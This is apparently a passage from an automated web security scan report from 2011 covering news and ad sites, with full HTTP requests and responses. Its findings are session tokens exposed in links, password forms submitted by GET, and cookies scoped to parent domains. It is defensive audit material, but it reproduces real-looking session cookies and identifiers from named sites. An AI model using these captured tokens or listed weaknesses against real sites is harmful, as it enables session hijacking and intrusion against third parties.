Path:   /news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html HTTP/1.1
Host: www.indianasnewscenter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 09 May 2011 13:49:37 GMT
Vary: Accept-Encoding
X-Server-Name: dv-c1-r2-u24-b9
Content-Type: text/html;charset=utf-8
Date: Mon, 09 May 2011 13:59:02 GMT
Connection: close
Set-Cookie: click_mobile=0
Content-Length: 71453

               
                                                                               <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<title>

   
                                   At Noon: Casey A
...[SNIP]...
<body class="parentnews path-news-local article" id="entry-121488004">
<script id="aptureScript" type="text/javascript" src="http://www.apture.com/js/apture.js?siteToken=pgKiQTB" charset="utf-8"></script>
...[SNIP]...

7.6. http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.orlandosentinel.com
Path:   /business/os-cfb-cover-casey-tv-20110509,0,6839926.story

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /business/os-cfb-cover-casey-tv-20110509,0,6839926.story HTTP/1.1
Host: www.orlandosentinel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.orlandosentinel.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Type: text/html; charset=UTF-8
X-Instance-Name: i7s30z1n1
Last-Modified: Mon, 09 May 2011 13:58:29 GMT
Vary: Accept-Encoding
Cache-Control: private, max-age=142
Date: Mon, 09 May 2011 13:59:15 GMT
Connection: close
Content-Length: 227706


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//E
...[SNIP]...
<li>

<a href="http://www.cars.com/go/crp/index.jsp;jsessionid=3K2EIDRGSYOU3LAYIEVE2VA?aff=osent" name="&lpos=Sub&lid=Research Cars" rel="nofollow" >Research Cars</a>
...[SNIP]...

7.7. http://www.orlandosentinel.com/business/transparent  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.orlandosentinel.com
Path:   /business/transparent

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /business/transparent HTTP/1.1
Host: www.orlandosentinel.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mainPage=/business

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.orlandosentinel.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Location: http://www.orlandosentinel.com/hive/error/notfound.jsp
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Cache-Control: private, max-age=180
Date: Mon, 09 May 2011 13:59:31 GMT
Connection: close
Content-Length: 130184


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
   <meta http-equiv="X-UA-Compatible" con
...[SNIP]...
<li>

<a href="http://www.cars.com/go/crp/index.jsp;jsessionid=3K2EIDRGSYOU3LAYIEVE2VA?aff=osent" name="&lpos=Sub&lid=Research Cars" rel="nofollow" >Research Cars</a>
...[SNIP]...

8. Password field submitted using GET method  previous  next
There are 2 instances of this issue:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.


8.1. http://www.floridatoday.com/odygel/lib/userauth/content/login.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.floridatoday.com
Path:   /odygel/lib/userauth/content/login.html

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /odygel/lib/userauth/content/login.html HTTP/1.1
Host: www.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70008|D08734_72078; GCIONSN=AAAAOn52dzoxfnVidDox; GCIONPN=AAAAOn5zZWdtZW50czpEMDg3MzRfNzAwMDh8RDA4NzM0XzcyMDc4; s_cc=true; s_sq=%5B%5BB%5D%5D; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A16H%2Cplacementid%3A1273145%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1273144/0/0/ADTECH%253Balias%253Dfl-brevard.flatoday.com/news/article.htm_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D24711%253Bmisc%253D1304949586599%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1305007188

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 15 Nov 2010 22:45:32 GMT
Accept-Ranges: bytes
ETag: "08e11cf1685cb1:0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:37 GMT
Connection: close
Content-Length: 2828

   <div class="ody-login-box clearfix">
       <a><div id="ody-login-close" class="ody-close"></div></a>
       <div class="ody-title">Log In<span class="ody-orsignup" id="ody-login-signup" >or&nbsp;<a>Sign Up<
...[SNIP]...
</div>
       <form id="ody-login-form" onsubmit="return false">
       <div class="ody-fields">
...[SNIP]...
<div class="ody-f-i"><input type="password" id="Password" name="Password" onkeypress="GDN.HandleKeyPress(event, GDN.UA.Events.Login.Click, 13);" style="width: 200px" />
                   </div>
...[SNIP]...

8.2. http://www.floridatoday.com/odygel/lib/userauth/content/signup.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.floridatoday.com
Path:   /odygel/lib/userauth/content/signup.html

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password fields:

Request

GET /odygel/lib/userauth/content/signup.html HTTP/1.1
Host: www.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70008|D08734_72078; GCIONSN=AAAAOn52dzoxfnVidDox; GCIONPN=AAAAOn5zZWdtZW50czpEMDg3MzRfNzAwMDh8RDA4NzM0XzcyMDc4; s_cc=true; s_sq=%5B%5BB%5D%5D; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A16H%2Cplacementid%3A1273145%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1273144/0/0/ADTECH%253Balias%253Dfl-brevard.flatoday.com/news/article.htm_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D24711%253Bmisc%253D1304949586599%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1305007188

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 17 Nov 2010 21:52:00 GMT
Accept-Ranges: bytes
ETag: "0c064a9a186cb1:0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:37 GMT
Connection: close
Content-Length: 7620

   <div class="ody-pa-box ody-su-box clearfix">
       <a><div id="ody-signup-close" class="ody-close"></div></a>
       <div class="ody-title">Sign Up<span class="ody-orlogin" id="ody-signup-login">or <a>Log i
...[SNIP]...
</div>
           <form id="UAWidget-Registration" name="UAWidget-Registration" onsubmit="return false">
           <div id="ody-signup-main" class="ody-noerrors">
...[SNIP]...
<div class="ody-f-i"><input type="password" id="Password" name="Password" onkeypress="GDN.HandleKeyPress(event, GDN.UA.Events.Registration.RegistrationClick, 13);" size="30" /></div>
...[SNIP]...
<div class="ody-f-i"><input type="password" id="ConfirmPassword" name="ConfirmPassword" onkeypress="GDN.HandleKeyPress(event, GDN.UA.Events.Registration.RegistrationClick, 13);" size="30" /></div>
...[SNIP]...

9. Cookie scoped to parent domain  previous  next
There are 93 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


9.1. http://api.twitter.com/1/statuses/user_timeline.json  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1/statuses/user_timeline.json?screen_name=clash_music&callback=TWTR.Widget.receiveCallback_1&include_rts=true&count=3&clientsource=TWITTERINC_WIDGET&1304949966734=cachebust HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: api.twitter.com

Response

HTTP/1.0 400 Bad Request
Date: Mon, 09 May 2011 14:07:38 GMT
Server: hi
Status: 400 Bad Request
X-RateLimit-Limit: 150
X-RateLimit-Remaining: 0
X-Runtime: 0.00679
Content-Type: application/json; charset=utf-8
Content-Length: 306
X-RateLimit-Class: api
Cache-Control: no-cache, max-age=300
X-RateLimit-Reset: 1304953175
Set-Cookie: k=173.193.214.243.1304950057993657; path=/; expires=Mon, 16-May-11 14:07:37 GMT; domain=.twitter.com
Set-Cookie: guest_id=130495005799789295; path=/; expires=Wed, 08 Jun 2011 14:07:37 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCA6sFdUvAToHaWQiJTI1NzM4ZGNiNzM3ZmRj%250AMWYyNzZmY2FhM2E1MTViMmRiIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--46243618f4526801b6b817f75048101c30bc6cbc; domain=.twitter.com; path=/; HttpOnly
Expires: Mon, 09 May 2011 14:12:37 GMT
Connection: close

TWTR.Widget.receiveCallback_1({"request":"\/1\/statuses\/user_timeline.json?screen_name=clash_music&callback=TWTR.Widget.receiveCallback_1&include_rts=true&count=3&clientsource=TWITTERINC_WIDGET&13049
...[SNIP]...

9.2. http://t.mookie1.com/t/v1/imp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://t.mookie1.com
Path:   /t/v1/imp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /t/v1/imp?migAgencyId=234&migSource=atlas&migAtlAI=205850969&migRandom=143243442&migTagDesc=Cingular&migAtlSA=286738722&migAtlC=480d7815-42e6-4315-a737-64cdf14f8adc HTTP/1.1
Host: t.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/286738722/direct;wi.468;hi.60/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B411066b5f02ce7a6%253B12fd50ec8f3%2C0%253B%253B%253B2504330642%2C7DlEAJUeFQAKf3sAAAAAACSrHgAAAAAAAgAAAAQAAAAAAP8AAAACCtSXIQAAAAAAO1ciAAAAAABSbigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACvfA0AAAAAAAIAAwAAAAAA88gO1S8BAAAAAAAAAGE0ODFmZWJjLTdhNDQtMTFlMC05MDA0LTczNGVhOWE2MDJiMQCvugEAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Esurphace%2Ecom%252Fads%252Frubicon%5Forlandosentinel%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13049496061384085-86537%26campID%3D60443%26crID%3D86537%26pubICode%3D2250555%26pub%3D321582%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fwww%2Esurphace%2Ecom%2Fads%2Frubicon%5Forlandosentinel%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; RMFL=011QD4ETU107OI|U107OK; RMFM=011QGuZMJ10CWN|U10CXL; NXCLICK2=011QGuZMNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_TE_ALL/1x1/11304348270.6228!y!B3!CXL!EVT; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:16 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: id=914804995789526; path=/; expires=Sat, 02-Jun-12 14:00:16 GMT; domain=.mookie1.com
Set-Cookie: session=1304949616|1304949616; path=/; domain=.mookie1.com
Content-Length: 35
Content-Type: image/gif

GIF87a.............,...........D..;

9.3. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /news/sufjan-stevens-suffered-nervous-breakdown

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/sufjan-stevens-suffered-nervous-breakdown HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:30 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESS5079a7bd09304b581fb1d164353615c5=47u27u5frb149p678dd9853b46; expires=Wed, 01-Jun-2011 17:33:50 GMT; path=/; domain=.clashmusic.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:00:30 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...

9.4. http://www.nme.com/news/sufjan-stevens/56527  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.nme.com
Path:   /news/sufjan-stevens/56527

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/sufjan-stevens/56527 HTTP/1.1
Host: www.nme.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
NmeAkamaiMatch: 1
IgniteAkamaiMatch: 1
X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2
X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3
X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/FirebugConsole/0.1
X-Wf-1-1-1-1: 55|[{"Type":"LOG"},"now: Mon, 09 May 2011 15:00:36 +0100"]|
X-Wf-1-1-1-2: 63|[{"Type":"LOG"},"id: 56830e3f97674f92659a8a7e54b9b44fea17850e"]|
X-Wf-1-1-1-3: 23|[{"Type":"LOG"},"li: "]|
X-Wf-1-1-1-4: 24|[{"Type":"LOG"},"cs: 1"]|
X-Wf-1-1-1-5: 23|[{"Type":"LOG"},"rc: "]|
X-Wf-1-1-1-6: 24|[{"Type":"LOG"},"ic: 1"]|
X-Wf-1-1-1-7: 28|[{"Type":"LOG"},"ttl: 3560"]|
X-Wf-1-1-1-8: 29|[{"Type":"LOG"},"mu: 786432"]|
X-Wf-1-1-1-9: 41|[{"Type":"LOG"},"ts: 0.0014510154724121"]|
X-Wf-1-1-1-10: 25|[{"Type":"LOG"},"ct: us"]|
Content-Type: text/html
Vary: Accept-Encoding
Expires: Mon, 09 May 2011 14:00:37 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 14:00:37 GMT
Connection: close
Set-Cookie: ServerID=1043; path=/
Set-Cookie: PHPSESSID=nb14qm2u5j3cpt8fp8muap0hh1; path=/; domain=.nme.com
Set-Cookie: ignite_loggedin=false; expires=Wed, 08-Jun-2011 14:00:36 GMT; path=/; domain=.nme.com
Set-Cookie: browsertype=web; expires=Tue, 10-May-2011 14:00:37 GMT; path=/; domain=.nme.com
Content-Length: 62535

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/
...[SNIP]...

9.5. http://ad.afy11.net/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad?mode=7&publisher_dsp_id=2&external_user_id=2931142961646634775 HTTP/1.1
Host: ad.afy11.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a=dlTCn+fJdUa0LKLUTmKT9w; f=AgECAAAAAADQJJIL142rTdU9kgdm-bJN; c=AQEDAAAAAADd1IcE942rTQAAAAAAAAAAAAAAAAAAAADXjatNAQABAAVhFtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD-OLnU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHTSCgFcjqtNAAAAAAAAAAAAAAAAAAAAADuOq00BAAEABWEW1egAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP84udToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoOsmAWj9sk0AAAAAAAAAAAAAAAAAAAAAZv2yTQEAAQD5JiDV6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyyS71OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=; s=1,2*4dab79ba*48Tp2my9Nk*5pS60fYTxp8svLzyNVfDVhLzEw==*,5*4db5834c*2EEOB9ANdq*SF70FY7-Mq4FQiM_*

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate
Server: AdifyServer
Content-Type: image/gif
Content-Length: 45
Set-Cookie: s=1,2*4dab79ba*UMOtU6T9f3*5oBTqxB3t3jlHiD_vqydkrPvYQ==*,5*4db5834c*2EEOB9ANdq*SF70FY7-Mq4FQiM_*; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"

GIF89a.............!.......,...........D..;if

9.6. http://ad.turn.com/server/pixel.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=12 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=Dza9cImQIgAOYp1sdVBFKJ3j2mm-3nw5DLdjMDY9RiDfaqaDzVRu9ZiuBStYaftY-vQa-Lrt8AEh2sMWSofalPWfoLMBxH0g9IiAwEZtd5YPMEpw2Dimbl_Ar_3pbVlWCr9zpcNmhJ4YALFsRS0OjTgV6OPboE5AailwYD2p-IySdlkZutLQ7ZQ85RG7C4VB2qlA743KvZ39ywpdZbpMhh0Lmtiu91APHHd__cAh9gz07Cd5Zg6Jg2z-OuW7NiYiFK2x3qhPSvxxgQjvFMzvNsv0sG_uSycuZycGHG0i9JDVJjS_HVyCCR3CpH4C_z7OWENSx6qTFa7od7SUHN9Egei6BZRgi_D5YzTOICCuYCx9jiGo5Ucxoan5H4AQ_xV3iHql4u4O7_sSYdnd02k2DNQHkfpT4yC0sBHWKifDZRo8VXe-PeWk1nfFtbmH7GvZ1QMXO5GUno07zoygwBocRoTsxUcxWk5nbrSqN6k58j1TORmwcQ4tlm0RwihyF_UsCL2x9N8rCbkNMc9dtlOLKF16IBansyDt77nh-l623XjbgLPXgE5UhrKbb-yapi7Iz_t1m3RC9HNVGEroWY24Hx0ymz9iB_PZ274hwZ5aW0QB1cBEZ955Qck8jqa4MZ7v1aY1ttiEjhYPnmeJ7sqVaGWGUflWpKK8ZDluGXe-OMAMpHNeDinV6bUD4c7xTKPYqOV7QZ7aFBA3m0phFzvLGUyTINTvrbznNuEHAKkRnaoKqQQIp4dB6WERi9SKRUeAKB26GseFkfH7OU-Y9jArFwJN1aNKu26HMlC2vlBlEo3AibJolRtP9GKY2j0AIA4QF0ROUKwFAxzf5GHHC-l2sUbwMrieaxWXba1ERSK3tWWrKuMIkiwSl3Te1VhilaTSnNbIlFewbQ0HwOyAYWPKVOFzsrgdqMMSA-afxC3bSvIKc60386S8NF-JuqnS_gYeiHql4u4O7_sSYdnd02k2DGktwZFEgr-H1aRa-v8iL2Y8VXe-PeWk1nfFtbmH7GvZojS9aaLdC4dIDTz1p5oDzGZlZrZQz9gqPi_YpBWRR_zyJstfeR3BF0X80yINyf_bnscLz8pWZl03MCHITMyErF16IBansyDt77nh-l623XgQrvHzCa6-Ar3OKf1u5O9co8jF4KazkjYUhi9Y-2cpubMeTwvrsn6UDDgstfmlQPoNQYQoyiD68kJjw-yNw0ZU1aY1ttiEjhYPnmeJ7sqVaHrw4FE_cCyjpsbZ3unV7uMrdoKrhpnovF-eFvpriEhVrMfpGoruuBgzA1-jEhdCS2wFnaEJ_77D-SBSvq4apv0KqQQIp4dB6WERi9SKRUeApAoLbAXgH3MAg4fG-53hwYWvZ7p1zrzJVM0-BhBuMNYrc7Kk7dBes7lnotHfeZ9VkUKGgPT-wupZmNTexU6iznjzwSpHwNAhjAO4xxi375pcdR85v5iezdnNkxnuNwjFRvAyuJ5rFZdtrURFIre1ZZBSlbvBC0evnYqUUsRvAsWc1siUV7BtDQfA7IBhY8pUNZFdTBAhalBFYq3Dyxi9TBfNNCsQZvwCdk93ue_PwR2IeqXi7g7v-xJh2d3TaTYMVxQyOpakzryCsBb1QMcxxTxVd7495aTWd8W1uYfsa9lUSQm6Px99bWr2RVRxuk2yEM0JJ22tYCLP7uBw8UeaI1M5GbBxDi2WbRHCKHIX9Sz_QtJiSnym5S_qsqKzl484XXogFqezIO3vueH6XrbdeBrsNvqpBtQW35VrocWM1hJEMrVYqmvz7xJtELJ71uRTTECD0HA2vYVMATXXOR4kic7TP4ECMD5bQt22Ufb1ASjVpjW22ISOFg-eZ4nuypVoX3-sqUKgtXKTyeeAJ3WoNBTpFHNeMdsJNdx7bmFAC56JAHYn97lyiGJ5XDJCkUNkw_be5i-Fx9NF-BKeFGAMPAqpBAinh0HpYRGL1IpFR4AB4o7EViaAPEO7EwRwSKXjmcb3GKio9SBOsgaqPfeFsasCu54shXpdyVhXu91m5wiW91g1mAzej0c7wnGxz5vZRvAyuJ5rFZdtrURFIre1ZfDRnDTWzff-YlyXP_zUgfGc1siUV7BtDQfA7IBhY8pUeWxnJe61Raa9uTyiNiaLtdI3rxLW4kElZ2z2lu4o7hWIeqXi7g7v-xJh